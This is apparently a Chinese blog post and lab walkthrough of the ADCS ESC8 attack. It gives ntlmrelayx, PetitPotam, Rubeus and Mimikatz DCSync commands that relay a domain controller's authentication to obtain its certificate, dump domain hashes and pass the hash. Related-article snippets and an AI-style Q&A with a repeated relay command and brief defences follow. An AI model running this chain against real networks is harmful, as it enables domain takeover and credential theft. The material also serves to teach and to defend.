ADCS-ESC8漏洞利用

最新推荐文章于 2025-02-27 15:23:32 发布
最新推荐文章于 2025-02-27 15:23:32 发布
阅读量795 收藏 3
点赞数 20
CC 4.0 BY-SA版权
文章标签: ADCS 域安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44001905/article/details/145871041

原理

在默认配置下,Web 证书注册页面仅采用 HTTP 协议进行通信,同时支持使用 NTLM 身份验证机制来确认用户身份。然而,该页面并未启用任何针对 NTLM Relay 攻击的防护措施,攻击者可以通过中继受害者的认证请求,伪装成受害者向证书颁发机构(CA)请求证书,从而实现持久化的权限提升或域控接管。

漏洞利用条件

ADCS Web Enrollment 启用: 目标环境中存在启用了 Web 注册功能的证书颁发机构(CA),通常访问路径为 http://<CA服务器>/certsrv/。

NTLM 认证支持: Web 端点支持 NTLM 认证,且未强制启用 HTTPS 或扩展保护(Extended Protection for Authentication, EPA),这使得 NTLM 中继攻击成为可能。

证书模板可用: CA 上至少有一个已发布的证书模板允许客户端认证(Client Authentication)或域计算机注册(Domain Computer Enrollment),例如默认的 Machine 或 DomainController 模板。

漏洞环境验证

ADCS默认存在http://<CA服务器>/certsrv/

访问http://<CA服务器>/certsrv/certfnsh.asp页面

漏洞利用

环境介绍

域控:192.168.110.127

证书服务器:192.168.110.153

域内主机:192.168.110.222

域外kali:192.168.110.155

攻击过程

在域外kali上执行

使用impacket中的ntlmrelayx.py进行监听

python ntlmrelayx.py -t http://192.168.110.153/certsrv/certfnsh.asp --adcs --template DomainController

使用 PetitPotam 诱导DC向攻击者认证

python PetitPotam.py 192.168.110.155 192.168.110.127 -d lutra.com

ntlmrelayx.py捕获并中继认证到CA,请求DomainController模板的证书。

在域内主机上执行

获得证书后,使用Rubeus请求TGT

Rubeus.exe asktgt /user:D1C$ /certificate:dc.pfx /dc:192.168.110.127 /ptt

使用klist查看缓存的票据

使用Mimikatz执行DCSync获取域内所有用户的NTLM Hash

发起PTH攻击,发现域内普通账户没有权限

切换到当前域内主机本地管理员账户进行操作

PTH攻击后,已经有权限访问域控目录

Iam0x17
关注
ADCS攻击系列【ESC1-8】详解
渗透之路,攻防之间皆学问
09-11 775
ADCS(Active Directory Certificate Services),是微软提供的一套证书服务解决方案,用于实现公钥基础结构(PKI)的功能,包括证书的产生、管理、存储、分发和撤销等。ADCS能够与现有的Active Directory Domain Services(ADDS)服务结合,用于加密文件系统、数字签名以及身份验证等多种安全应用场景。在ADCS中,证书颁发机构(CA)扮演着核心角色,负责接收证书申请、验证申请者信息、颁发证书以及管理证书的吊销等。
ADCS ESC1+ESC4+CVE-2022–26923
问题很多的小明
06-27 665
ADCS渗透相关
PetitPotam漏洞复现(ESC8)结合CVE-2019-1040
whojoe的博客
08-02 3894
PetitPotam漏洞复现环境搭建漏洞复现参考文章 环境搭建 主机 机器名 ip 用户 密码 版本 控1 ad.test.com 192.168.164.147 administrator Aa1234 win2012r2 控2 ad2.test.com 192.168.164.146 administrator Aa1234 win2012r2 内机器 user.test.com 192.168.164.129 user1 Uu1234. win2008r2 kali
安全|AD CS Relay—ESC8
weixin_42282189的博客
03-24 7691
作者: 0xYyy 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 国外安全研究人员在6月份已经披露过攻击手法—通过证书进行中继从而来达到攻击控的目的。 https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/ 0x02 AD CS作用 1、证书颁发机构(CA):可以向用户、机构和服务颁发证书。 2、CA WEB注册:用户可以通过web浏览器申请证书。 3、联机响应程序.
ADCS攻击之NTLM Relay攻击 ESC8
Adminxe的博客
03-05 923
ADCS在默认安装的时候,其Web接口支持NTLM身份验证并且没有启用任何NTLM Relay保护措施。强制控制器计算机帐户(DC$)向配置了NTLM中继的主机进行身份验证。身份验证被转发给证书颁发机构(CA)并提出对证书的请求。获取到了DC$的证书后就可以为用户/机器请求TGS/TGT票据,获取相应的权限。curl-I。
红队|渗透重要漏洞总结
渗透测试研究中心
11-24 1540
1.MS14-068kerberos认证,no PAC用户在向 Kerberos 密钥分发中心(KDC)申请TGT(由票据授权服务产生的身份凭证)时,可以伪造自己的 Kerberos 票据漏洞效果:将任意用户提升到管权限利用条件:1.小于2012R2的控 没有打MS14-068的补丁(KB3011780)2.拿下一台加入的计算机3.有这台内计算机的用户密码和Sid利用方式:在《Ker...
ESC8:NTLM Relay 中继到 Web 证书注册服务
anddddoooo的博客
02-21 1035
因为Web证书注册服务默认使用NTLM协议进行身份认证,所以可以中继到访问Web证书注册服务的HTTP协议,然后就能利用目标用户的身份获得到此用户的身份验证证书。拿到此用户证书后,就拿到了此用户的凭据。NTLM Relay的常见攻击场景:攻击控:控机器账户有 DCSync 权限,可以到处内任意用户 hash。攻击 Exchange 服务器:这个服务器的机器账户能用于远程连接登录,也可以配置 DCsync 权限。攻击内普通机器:内普通机器账号可以结合基于资源的约束性委派,获得管理员权限。
ADCS-ESC6漏洞环境构造与利用
信息安全
02-27 225
然而,按照微软描述,设置该标志后,攻击者能利用这一机制为任意用户注册证书。:攻击者必须拥有向 CA 提交证书请求的权限(通常为普通用户权限)。在企业内部基于 PKI 为 Web 服务器颁发证书的场景中,管理员为给证书添加额外主机名,会在 CA 上设置。该标志允许证书请求中自定义主题备用名称(SAN)字段,包括任意用户身份信息(如管理员)。将申请的证书复制保存为esc6.pem,使用openssl转为esc6.pfx,密码为空即可。使用Rubeus请求管administrator的TGT。
ADCS证书服务器攻击中看集权安全(上)
ZAWX_NETSTARSEC的博客
05-11 311
(2)当client发送身份信息给AS后,AS会先向活动目录AD请求,询问是否有此Client用户,如果有的话,就会取出它的 NTLM-Hash,并对 AS_REQ 请求中加密的时间戳进行解密,如果解密成功,则证明客户端提供的密码正确,如果时间戳在五分钟之内,则预认证成功。接着从-----BEGIN RSA PRIVATE KEY----------END CERTIFICATE-----复制出来,保存为ESC1.pem,然后利用openssl来转换为ESC1.pfx,无需设置密码。
内网渗透(八十五)之ADCS证书服务攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-28 1312
2021年6月17日,国外安全研究员 Will Schroeder 和 Lee Christensen 共同发布了针对ADCS(Active Directory Certificate Service, 活动目录证书服务)的攻击手法。同年8月5日,在Black Hat 2021上 Will Schroeder 和 Lee CHristensen 对该攻击手法进行了详细讲解。至此,ADCS攻击第一次进入人们的视野。
终于有人把渗透之ADCS证书攻击讲透了
weixin_65550121的博客
12-09 2731
PKI是一个术语,有些地方会采用中文的表述——公钥基本结构,用来实现证书的产生、管理、存储、分发和撤销等功能。我们可以把他理解成是一套解决方案,这套解决方案里面需要有证书颁发机构,有证书发布,证书撤掉等功能。
Windows Server Active Directory 证书服务(AD CS)安装与部署指南
热门推荐
有技术的机械师
07-08 2万+
本篇文章重点介绍一下Windows Server Active Directory 证书服务安装与部署。 从以下几个方面入手介绍:
用 10 行代码实现边缘端的图像识别功能
08-05
资源下载链接为: https://pan.quark.cn/s/2e7a8b16941c 用 10 行代码实现边缘端的图像识别功能(最新、最全版本!打开链接下载即可用!)
基于STM32F103C8T6微控制器的2024年全国大学生电子设计竞赛H题自动行驶小车完整实现项目_包含HAL库驱动开发_电机控制_红外循迹_超声波避障_OLED显示_蓝牙遥控_.zip
08-05
基于STM32F103C8T6微控制器的2024年全国大学生电子设计竞赛H题自动行驶小车完整实现项目_包含HAL库驱动开发_电机控制_红外循迹_超声波避障_OLED显示_蓝牙遥控_.zip
errorlink问题定位
08-05
errorlink问题定位
小猿口算自动比大小,使用OCR图像识别,速度较慢
最新发布
08-05
资源下载链接为: https://pan.quark.cn/s/54c16393c70b 小猿口算自动比大小,使用OCR图像识别,速度较慢(最新、最全版本!打开链接下载即可用!)
【数字图像处理】基于MATLAB的图像增强与滤波技术:灰度直方图均衡化、平滑及锐化方法综述
08-05
内容概要:本文档详细介绍了数字图像处理技术,包括灰度直方图、图像平滑和图像锐化三大模块的内容。灰度直方图部分讲解了其定义、性质及直方图均衡化,并附带MATLAB代码实现和结果分析。图像平滑部分探讨了领平均法、中值滤波和边界保持类滤波(如KNN算法),同样配有MATLAB代码和结果分析。图像锐化部分则涵盖了梯度锐化法、Roberts算子、Laplacian算子、Prewitt算子和Sobel算子的原理、实现代码及其结果分析。 适合人群:具备一定编程基础,尤其是熟悉MATLAB语言,对数字图像处理有兴趣的学习者和研究人员。 使用场景及目标:①帮助学习者理解数字图像处理的基础概念和技术手段;②通过具体案例和MATLAB代码实现,掌握图像处理的具体操作方法;③培养解决实际图像处理问题的能力,如噪声去除、图像增强等。 阅读建议:此文档内容详尽,理论与实践相结合,建议读者在学习过程中边阅读边动手实践提供的MATLAB代码,并尝试调整参数以加深理解。此外,读者应结合自身需求关注不同算法的特点和应用场景,以便更好地应用于实际工作中。
D10NGYANG_GaodeMapDemo_20352_1754324889106.zip
08-05
D10NGYANG_GaodeMapDemo_20352_1754324889106.zip
ECharts WordCloud:基于 WordCloud2.js 的 ECharts 词云扩展组件
08-05
资源下载链接为: https://pan.quark.cn/s/d9ef5828b597 ECharts WordCloud:基于 WordCloud2.js 的 ECharts 词云扩展组件
adcs
03-28
<think>好的,用户的问题是关于ADCS的,他们可能遇到了拼写错误或者对缩写不理解的情况。首先,我需要确认ADCS的含义。根据提供的引用,ADCS指的是Active Directory Certificate Services,即活动目录证书服务。用户可能是在内网安全或渗透测试的上下文中遇到这个术语,所以需要详细解释ADCS的基本概念、功能以及相关安全风险。 接下来,用户提供的引用中有多个关于ADCS利用和配置的信息,比如证书模板的安全性问题、NTLM中继攻击和安装配置步骤。需要将这些信息整合起来,说明ADCS环境中的作用,以及攻击者可能利用漏洞,比如证书模板权限配置不当导致的权限提升。 然后,用户可能想知道ADCS的具体应用场景和为什么在安全研究中重要。需要结合引用中的案例,如AD CS Relay攻击,说明攻击者如何通过获取证书来进一步入侵控,强调正确配置ADCS的重要性。 最后,生成相关问题时要覆盖ADCS的基础知识、安全配置、攻击方式和防御措施,确保问题能够帮助用户全面理解ADCS的相关内容。</think>ADCS是Active Directory Certificate Services(活动目录证书服务)的缩写,它是Windows Server提供的用于创建、管理和颁发数字证书的核心服务[^4]。该服务通过公钥基础设施(PKI)为环境提供身份验证、数据加密和数字签名功能。 ### 核心功能解析 1. **证书颁发** 可创建多种类型的数字证书,包括: - 用户身份验证证书(如智能卡登录) - 服务器SSL证书(用于IIS等Web服务) - 代码签名证书(验证软件来源可靠性) 2. **证书模板管理** 证书模板作为AD安全对象,其权限配置至关重要。错误配置可能导致安全风险,例如: ```powershell # 查看证书模板权限的命令示例 Get-ADObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Filter * -Properties ntSecurityDescriptor ``` 若低权限用户拥有`Write`权限,可能被用于伪造证书[^3]。 3. **证书吊销列表(CRL)** 通过定期发布的CRL实现证书状态验证,错误配置可能导致证书吊销机制失效。 ### 安全风险场景 1. **NTLM中继攻击** 攻击者利用ADCS服务作为中继目标,获取控证书: ```bash # 使用impacket工具进行中继攻击示例 ntlmrelayx.py -t https://adcs-server/certsrv/certfnsh.asp --adcs --template DomainController ``` 成功后可生成银票(Silver Ticket)进行持久化控制[^1][^2]。 2. **证书模板滥用** 当证书模板配置允许低权限用户注册控制器证书时,攻击者可能通过Web Enrollment接口(通常位于`/certsrv/`)申请高权限证书[^3]。 ### 防御建议 1. 定期审计证书模板权限 2. 禁用不必要的Web Enrollment服务 3. 配置CRL分发点(CDP)和授权信息访问(AIA)路径 4. 保持ADCS服务器补丁更新
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值